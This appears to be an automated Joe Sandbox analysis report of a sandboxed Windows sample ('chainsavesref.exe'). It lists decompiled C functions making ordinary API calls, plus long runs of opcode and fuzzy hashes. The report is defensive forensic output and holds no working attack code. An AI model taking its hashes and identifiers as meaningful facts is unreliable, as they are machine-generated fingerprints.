Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID:
API String ID: 289325740-1867143179
Opcode ID: 1955735bfd792312bce6841cbbc9f2c5b2b0db8ccfbbe51a316df52b85ad8b80
Instruction ID: 4a6a7a1fec62b93472107e6e045f6bfd8e5ff9233ebb09bc2ab15cd5b7ea96bd
Opcode Fuzzy Hash: 1955735bfd792312bce6841cbbc9f2c5b2b0db8ccfbbe51a316df52b85ad8b80
Instruction Fuzzy Hash: 41018071D02661DBCB61FF5DD8012ADB3A0BF18B21B19410AF9A467692CB346E418FC6

Uniqueness

Uniqueness Score: -1.00%

Function 0006130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0006130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0006DA71(0xa0ee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0006DA98(0xa0ee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xc2154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x935b4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00061312
0x00061375
0x00061314
0x00061314
0x0006131b
0x00061331
0x0006133a
0x0006133f
0x00061347
0x0006134f
0x00061357
0x00061365
0x00061365
0x00061357
0x00061347
0x0006133a
0x0006131b
0x0006137d

APIs

Part of subcall function 0006DA98: _swprintf.LIBCMT ref: 0006DABE
Part of subcall function 0006DA98: _strlen.LIBCMT ref: 0006DADF
Part of subcall function 0006DA98: SetDlgItemTextW.USER32(?,0009E154,?), ref: 0006DB3F
Part of subcall function 0006DA98: GetWindowRect.USER32(?,?), ref: 0006DB79
Part of subcall function 0006DA98: GetClientRect.USER32(?,?), ref: 0006DB85

GetDlgItem.USER32(00000000,00003021), ref: 0006134F
SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

Strings

0, xrefs: 0006130E

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: ac39eb437094757b79b05c7d977ad2ff09e3094c17a1571200582a2640c59d47
Instruction ID: 87ba0cc2706adf9a2555d5ddb4923f1841949cb1300622b4faf3a59b1154eed1
Opcode Fuzzy Hash: ac39eb437094757b79b05c7d977ad2ff09e3094c17a1571200582a2640c59d47
Instruction Fuzzy Hash: A9F0AFB010429CAADF654FA0CC09BEA3BDABB25305F0C8014FD4A54AF1C778CA95EB54

Uniqueness

Uniqueness Score: -1.00%

Function 0007084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0007084E(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00066E8C(E00066E91(_t6, 0xa0f50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xa0f50, 0xa0f50, 2);
				}
				return _t2;
			}

0x0007084e
0x00070854
0x0007085d
0x00070866
0x00000000
0x00070885
0x00070886

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00070A78,?), ref: 00070854
GetLastError.KERNEL32(?), ref: 00070860

Part of subcall function 00066E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00066EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00070869

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: bc05a9fcabba4da3d0be9be2da3e3090e94b5a29cf19e4d7b5197c09d6364ad6
Instruction ID: bcc222d9d8341bdfbfd3ec243d7bbc2743c7b8ef3dc09b81a77b1e11675947a5
Opcode Fuzzy Hash: bc05a9fcabba4da3d0be9be2da3e3090e94b5a29cf19e4d7b5197c09d6364ad6
Instruction Fuzzy Hash: 33D05E31A0802066DA102764AC0AEEF790AAF92730F604729F23D6A1F6DE2A095186D6

Uniqueness

Uniqueness Score: -1.00%

Function 0006DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0006DA4E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x0006da51
0x0006da61
0x0006da69
0x0006da6b
0x00000000
0x0006da6b
0x0006da70

APIs

GetModuleHandleW.KERNEL32(00000000,?,0006D32F,?), ref: 0006DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0006D32F,?), ref: 0006DA61

Strings

RTL, xrefs: 0006DA5B

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 2376de3101e12dafc4a110e5b4ae17217a947b36a65542c225149f5d58b03d90
Instruction ID: 377e59f387fa867022ae00f0270deb38f3ffe52716d4b89376dadcb9033d133c
Opcode Fuzzy Hash: 2376de3101e12dafc4a110e5b4ae17217a947b36a65542c225149f5d58b03d90
Instruction Fuzzy Hash: 32C01232789390B6EB3027606C1DB832A886B50B12F09044EB241DA1D0DAEACA408AA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: chainsavesref.exePID: 3372, Parent PID: 5824COMMON

Executed Functions

Function 00007FFC017E354B Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E3681
jt\_, xrefs: 00007FFC017E365E
jt\_, xrefs: 00007FFC017E363B

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID: jt\_$jt\_$jt\_
API String ID: 0-1201605121
Opcode ID: 6386eec570f296c5cfb79308df5c54f1e53f63af519a6956a1818e675df30fa7
Instruction ID: 91dc3b4a3d014afe4d15962e206cb68f9b43da250a7b4ff8d9ef4da9f5f28dfa
Opcode Fuzzy Hash: 6386eec570f296c5cfb79308df5c54f1e53f63af519a6956a1818e675df30fa7
Instruction Fuzzy Hash: 6741AD7190C95E8FEB98EB28D8556BDBBE1FF59710F1401B9D00ED7293DE252802CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E368E Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

Zr\_, xrefs: 00007FFC017E3700
jt\_, xrefs: 00007FFC017E36A4

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID: Zr\_$jt\_
API String ID: 0-676687960
Opcode ID: bfccaa61029c45ed710c96281826efdce514907e6784266a953c0cd8aa3cae9d
Instruction ID: c7f9b28d64c00e07238a4e371be102e4d12d864b7b2902460b35a2e1a4148ff7
Opcode Fuzzy Hash: bfccaa61029c45ed710c96281826efdce514907e6784266a953c0cd8aa3cae9d
Instruction Fuzzy Hash: 0141D3B1A5C55D8EEB84CB6CE8553BDBBE1EB8A320F54027EC00DD7686CAB61801CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E67BA Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E5CE9

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID: jt\_
API String ID: 0-3422377674
Opcode ID: a6d5aafef6e94e7c158d5d3937f6deae126c0db619aa4f924f1a55767338da81
Instruction ID: 7f5baa9cb1d67a49117e73447e4fd7147650b9e99e48d78d2690eaaec1504b5c
Opcode Fuzzy Hash: a6d5aafef6e94e7c158d5d3937f6deae126c0db619aa4f924f1a55767338da81
Instruction Fuzzy Hash: FA111C3190852E8FEB64DA08C8907F8B3F5EF59741F1042FAC40EE6282DA346AC5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E5CDE Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E5CE9

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID: jt\_
API String ID: 0-3422377674
Opcode ID: 04558afc59396f5fbcc8d36d67b8c3b79a09a9492c2d2b2323fd66af6aa6f0c6
Instruction ID: c4934debeedbbe67f3571d91449a31d9576972cd756697c98769cca66e935ae0
Opcode Fuzzy Hash: 04558afc59396f5fbcc8d36d67b8c3b79a09a9492c2d2b2323fd66af6aa6f0c6
Instruction Fuzzy Hash: 6FE0EC71A4C91E8FDFA4DA1CD894AB9B7E5EB58711F1043F5C40DD2206D93159C28F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E20B5 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0afc23c3e5a41f7934f0fe093dcf00baca44e8378fbddce0854144afd4d0a1f3
Instruction ID: 58a0a58a6aa483aa77d8969daab8ba0efc174957cfda4c0b3d8d6f6b024e3d3d
Opcode Fuzzy Hash: 0afc23c3e5a41f7934f0fe093dcf00baca44e8378fbddce0854144afd4d0a1f3
Instruction Fuzzy Hash: 23910235E0C66E8FEB59DB2888512B9B7E8EF4A700F0501BAD44DD71D3DE38A902C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E1278 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9692cbeb1ee3a4d770dc2086e062db57ef814f82a05706289eb353f411e4c033
Instruction ID: e6ab9f36c52dc4750e38094334565f3238279aa06840829c38b05fb698b013d8
Opcode Fuzzy Hash: 9692cbeb1ee3a4d770dc2086e062db57ef814f82a05706289eb353f411e4c033
Instruction Fuzzy Hash: 42810730A0CB9D8FDB48DE2C88565BAB7E1FF99714B5441BED44AC7297CE35A802C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E18BD Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ccbe870e1164459938884931b35947ec2242fcd74ac56ba0c14243531e2e8f
Instruction ID: fb8cdc94389dbc550bea040a31bfc645c90ed43a6f459a375a84d9419e64dc0e
Opcode Fuzzy Hash: 44ccbe870e1164459938884931b35947ec2242fcd74ac56ba0c14243531e2e8f
Instruction Fuzzy Hash: 7651C330A1CB9D8FDB48DE1C88655BAB7E2FF98714B54417ED44EC7286CE34A802C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F4610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bbe457be06396954b567d87378035b670218e3eb8b67d50969cc0d4728931a
Instruction ID: d48d67cebbfe651e64520ac3a500f53eb99ecbc66c85437edeed596f3849355f
Opcode Fuzzy Hash: 66bbe457be06396954b567d87378035b670218e3eb8b67d50969cc0d4728931a
Instruction Fuzzy Hash: 7451F870908A6D8FDF94EB68C855AAEBBF1FF59711F10016ED00EE3296CA356881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E3165 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb5a33f648c71d9d4777c107b777b7da818d4ad78e323f059457be7177d70850
Instruction ID: 28f7e0daff7f5393ad68e3b6eba8dcdb1e8cbbff076df049cc6fe60267ef01f7
Opcode Fuzzy Hash: eb5a33f648c71d9d4777c107b777b7da818d4ad78e323f059457be7177d70850
Instruction Fuzzy Hash: 33510770D0862E8FEB54EBA8C4956FDB7F5FF58701F50007AD009E7292DA39A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA68F Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a896d5f9a8c73a0d3cff2539dd5a11f549a158712f2d98bce8dffbf36c2bcd
Instruction ID: 83827ce931e9832d3207c6bd9617421fcfa652c8346f478f5071ee81fd39cb95
Opcode Fuzzy Hash: 69a896d5f9a8c73a0d3cff2539dd5a11f549a158712f2d98bce8dffbf36c2bcd
Instruction Fuzzy Hash: 9E31FF3090C66E8FEB45EB7884892FABBE0EF59315F1005BAE40DC70A2DE35A591C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA8A5 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118773fe623f2858b3b7f3d74ffded755d210a10b0393bb9dc879377b21fd84b
Instruction ID: 74c0a89ac2931ddafb6da3afe06ccf3761238bea13d56e7748c5bb8880966266
Opcode Fuzzy Hash: 118773fe623f2858b3b7f3d74ffded755d210a10b0393bb9dc879377b21fd84b
Instruction Fuzzy Hash: 9721BD34C1C69E8FEB59EF2888592B9BBE0EF58700F4104BAD40DC7193EE28A451C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E9DE1 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2914dba7320ecaf540faebd9ef6e6f78c04394aa1d8dfbc6a1165b07bcdfc793
Instruction ID: 4dd0e6bd88ad21c939d0d121eabeed923262c25491fc6cf609ac2ef716f4188a
Opcode Fuzzy Hash: 2914dba7320ecaf540faebd9ef6e6f78c04394aa1d8dfbc6a1165b07bcdfc793
Instruction Fuzzy Hash: 76215B7190865D8FDF89EF18C4996AD7BE0FF6C709F0001AAE80DC7252DB30A551CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E32A6 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edbf3ebabd984715ebc6d9d57caf0c6cd153bdf333b12e0c4c8b34d758f81842
Instruction ID: 25174d81ccbbcc8345193b257fb733329af26b79a63a8bafbd03b8edfaf1406d
Opcode Fuzzy Hash: edbf3ebabd984715ebc6d9d57caf0c6cd153bdf333b12e0c4c8b34d758f81842
Instruction Fuzzy Hash: FB21A670D0852D8FEB54EBA8C485AEDB7F5FF58701F14417AD009E7292CA39A981CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA831 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b47f7f2b444e5f83e81a08852616b363ee3c6cd58e8f3cf7e763d32ccc6f5b4
Instruction ID: 1b17a024ba01556f6c9c42ad9426a534c73077d554d5969b8adbd826a76055ad
Opcode Fuzzy Hash: 4b47f7f2b444e5f83e81a08852616b363ee3c6cd58e8f3cf7e763d32ccc6f5b4
Instruction Fuzzy Hash: 0B118170D9C65E8FE752EF2888891F9BBE0EF59B01F5145B6D40CC3093EE38A552C660

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E338E Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 900ec26abffdbaddf61b75a6441fbced0f9349d72ff7158b6d90dcdba00ce157
Instruction ID: 90bcb6fed28c94778f23702b403764820685ec7a35e91a94ccb418252851e449
Opcode Fuzzy Hash: 900ec26abffdbaddf61b75a6441fbced0f9349d72ff7158b6d90dcdba00ce157
Instruction Fuzzy Hash: B411B23084D65E8FEB42AB7888485F97BE4FF1A301F0405B6D008C7163DA38A546C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA795 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167c4a426d28947fd1f68ac4ab7dbafae8edab8eccb650673afd3a037c2dc581
Instruction ID: 578ff0079179108405e2ea2cd56ff161fede58a0e3ea8c24cb6186f264908f7e
Opcode Fuzzy Hash: 167c4a426d28947fd1f68ac4ab7dbafae8edab8eccb650673afd3a037c2dc581
Instruction Fuzzy Hash: 6C11AF6094C66E8EEB51EB6C88581B9BBF0EF59700F0505B6D009C7193EE34A945C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0D1D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f0850b652609de103932cd5c297293df1aba72aebd4010b0fcd0d2d3f1d66d
Instruction ID: 589d968c91aed4c850ac9c9084b07910be99db8a72b8a43cbaee05aa5ec9fa55
Opcode Fuzzy Hash: 89f0850b652609de103932cd5c297293df1aba72aebd4010b0fcd0d2d3f1d66d
Instruction Fuzzy Hash: EE11D030E0C56E8EEB55EB6C88582FDBBE0FF69710F0000BAD009C60D3DAB66485C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E997D Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c419f3becdb66b1bcaf0384ca68d984e6e158dde1538b699fe71a538595c21
Instruction ID: d97761b5152987b41dafeab96fd97ce3831f87ae3e5cbe7b23a9b864fdbf0f54
Opcode Fuzzy Hash: e3c419f3becdb66b1bcaf0384ca68d984e6e158dde1538b699fe71a538595c21
Instruction Fuzzy Hash: 0911827190865E8FDF88EF18C4996BE7BF0FFA8305F1005AAD419C7162DB34A551CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0AED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86151c934e9d09461e5a7d36a5507bdb8c9b1f438203ccb3029585e660e1b11f
Instruction ID: 9132052fda1e515883dd6f4e8d72b171c44e05245601b56671e868488b0c1c7d
Opcode Fuzzy Hash: 86151c934e9d09461e5a7d36a5507bdb8c9b1f438203ccb3029585e660e1b11f
Instruction Fuzzy Hash: 7B117F30A0841ECBEB54EB58C894AEEB3E6FB58300F104275900ADB196CE74A982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E2DCA Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bbf3707552388cd45f8ca031ee8a8243ec7c1236d551374239974715dde821
Instruction ID: dcbd9e4f9a50bb00252e176c869d7d14f5852d93a6733078ee101dbac88793d8
Opcode Fuzzy Hash: 14bbf3707552388cd45f8ca031ee8a8243ec7c1236d551374239974715dde821
Instruction Fuzzy Hash: 07018C30D0D6AE8FEB55EB3888481A9BBF4EF1E700F0144BAD408C70A3DA38A455C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E34A5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0e5df433eb43202e2a5c31439d0882482c609adb15936880b3c5e3a473d7f1
Instruction ID: 7e01df46f0774f4f4a6ebef2b3dc6248f2195a11ad707e1fe5b38c373babc426
Opcode Fuzzy Hash: 6c0e5df433eb43202e2a5c31439d0882482c609adb15936880b3c5e3a473d7f1
Instruction Fuzzy Hash: 39118B3590869E8FEB99EF6884592BEBBE0FF19704F0005BED41AC7192DA39A541C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA6FD Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03e18838ef450cd8b4b8fb91c0f17be0af1747d5e56cfaf54254b8745a99069
Instruction ID: 81f77cc9c16c1a34d4312acd1ba9852f9c9d1865e19272305cb24649fc0219f2
Opcode Fuzzy Hash: e03e18838ef450cd8b4b8fb91c0f17be0af1747d5e56cfaf54254b8745a99069
Instruction Fuzzy Hash: F0118B3090862ECFEB84EB6884592BEBBE0FF58304F1004BAD41DC3192DA316191CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E9F11 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4690a123edbe253b7c9879893a7f8cbd70267bbe0975c5b4352b452f57ccb59
Instruction ID: 8758b721d5fd17ed2bbeef418e59960ac3103e64bec45c0e881597063d49312e
Opcode Fuzzy Hash: c4690a123edbe253b7c9879893a7f8cbd70267bbe0975c5b4352b452f57ccb59
Instruction Fuzzy Hash: 1A01BC31D1C66E8FEB51EB2884492F9BBE0EF19B05F4005BAD50CC70A3EA38E541C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E05F1 Relevance: .1, Instructions: 51COMMON

